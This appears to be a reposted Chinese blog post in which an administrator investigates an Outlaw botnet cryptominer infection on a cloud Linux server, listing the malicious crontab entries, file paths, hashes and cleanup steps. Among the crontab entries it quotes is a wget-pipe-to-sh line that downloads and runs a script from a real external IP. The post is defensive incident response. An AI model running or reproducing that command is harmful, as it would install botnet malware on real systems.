從《亡命徒（Outlaw）僵尸網絡感染約2萬臺Linux服務器，騰訊安全提醒企業及時清除》 一文得知 kswapd0 是挖礦程序，tsm 是爆破程序【tsm之前見過，占用率不高，還以為是 TencentSystemManager 😠】這次沒有 tsm 進程了，看來已經爆破成功 😢

1.開始排查

# 只保留有問題的兩個進程【曾經kill過 沒在意 之前的cpu占用沒有這么高】 [root@tcloud ~]# top top - 13:55:18 up 21 days, 4:43, 1 user, load average: 4.52, 4.25, 3.76 Tasks: 285 total, 1 running, 284 sleeping, 0 stopped, 0 zombie %Cpu(s): 96.7 us, 2.6 sy, 0.0 ni, 0.0 id, 0.0 wa, 0.0 hi, 0.7 si, 0.0 st KiB Mem : 1882020 total, 110312 free, 1209604 used, 562104 buff/cache KiB Swap: 0 total, 0 free, 0 used. 218676 avail MemPID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND3460 elastic+ 20 0 307928 269380 4 S 70.8 14.3 611:32.96 cron6011 elastic+ 20 0 50476 15104 4 S 24.9 0.8 4:55.06 sshd

查看了一下定時任務：

[root@tcloud ~]# crontab -l no crontab for root

查看了一下 /var/spool/cron/ 文件夾的定時任務：

[root@tcloud ~]# cd /var/spool/cron/ [root@tcloud cron]# ll total 12 -rw------- 1 elasticsearch elasticsearch 328 Sep 13 23:19 elasticsearch -rw------- 1 gpadmin gpadmin 73 Sep 2 01:55 gpadmin -rw------- 1 hadoop hadoop 283 Aug 20 11:57 hadoop[root@tcloud cron]# cat ./elasticsearch 1 1 */2 * * /usr/local/elasticsearch/.configrc/a/upd>/dev/null 2>&1 @reboot /usr/local/elasticsearch/.configrc/a/upd>/dev/null 2>&1 5 8 * * 1 /usr/local/elasticsearch/.configrc/b/sync>/dev/null 2>&1 @reboot /usr/local/elasticsearch/.configrc/b/sync>/dev/null 2>&1 #0 */23 * * * /tmp/.X26-unix/.rsync/c/aptitude>/dev/null 2>&1# 這個明顯就是kdevtmpfsi挖礦病毒的定時任務 [root@tcloud cron]# cat ./gpadmin * * * * * wget -q -O - http://195.3.146.118/spr.sh | sh > /dev/null 2>&1[root@tcloud cron]# cat ./hadoop 1 1 */2 * * /tmp/.X25-unix/.rsync/c/a/upd>/dev/null 2>&1 @reboot /tmp/.X25-unix/.rsync/c/a/upd>/dev/null 2>&1 5 8 * * 1 /tmp/.X25-unix/.rsync/c/b/sync>/dev/null 2>&1 @reboot /tmp/.X25-unix/.rsync/c/b/sync>/dev/null 2>&1 0 */23 * * * /tmp/.X25-unix/.rsync/c/aptitude>/dev/null 2>&1

查看了一下阿里云的服務器：

[root@aliyun ~]# cd /var/spool/cron/ [root@aliyun cron]# ll total 0

2.病毒處理建議

建議企業 Linux 服務器管理員檢查服務器資源占用情況，及時修改弱密碼，避免被暴力破解。若發現服務器已被入侵安裝挖礦木馬，可參考以下步驟手動檢查、清除：

刪除以下文件，殺死對應進程：
/tmp/*-unix/.rsync/a/kswapd0
*/.configrc/a/kswapd0 md5: 84945e9ea1950be3e870b798bd7c7559
/tmp/*-unix/.rsync/c/tsm64 md5: 4adb78770e06f8b257f77f555bf28065
/tmp/*-unix/.rsync/c/tsm32 md5: 10ea65f54f719bffcc0ae2cde450cb7a

檢查 cron.d 中是否存在包含以下內容的定時任務，如有進行刪除：
/a/upd
/b/sync
/c/aptitude

3.詳細處理過程

# 1.先刪除了 /var/spool/cron/ 下的全部文件 # 2.kill掉【cron】和【sshd】兩個進程 # 3.查找定時任務 [root@tcloud ~]# find / -name cron.d /usr/local/elasticsearch/.configrc/cron.d /etc/cron.d# /etc/cron.d 文件夾下文件【未發現病毒定時任務】# 查看/usr/local/elasticsearch/.configrc/cron.d后發現是病毒任務 將其刪除 [root@tcloud ~]# cat /usr/local/elasticsearch/.configrc/cron.d1 1 */2 * * /usr/local/elasticsearch/.configrc/a/upd>/dev/null 2>&1@reboot /usr/local/elasticsearch/.configrc/a/upd>/dev/null 2>&15 8 * * 1 /usr/local/elasticsearch/.configrc/b/sync>/dev/null 2>&1@reboot /usr/local/elasticsearch/.configrc/b/sync>/dev/null 2>&1#0 */23 * * * /tmp/.X26-unix/.rsync/c/aptitude>/dev/null 2>&1 # 4.查找 kswapd0 相關文件【未找到】 [root@tcloud ~]# find / -name kswapd0 # 5.查找 tsm64 相關文件【未找到】 [root@tcloud ~]# find / -name tsm64 # 6.查找 tsm32 相關文件【未找到】 [root@tcloud ~]# find / -name tsm32

4.總結

感覺上處理的并不徹底，先觀察一下 😂

與50位技術專家面對面20年技術見證，附贈技術全景圖

總結

以上是生活随笔為你收集整理的【Linux病毒】腾讯云 cron、sshd 进程CPU占用超95％（亡命徒 Outlaw 僵尸网络攻击）问题排查及处理步骤的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。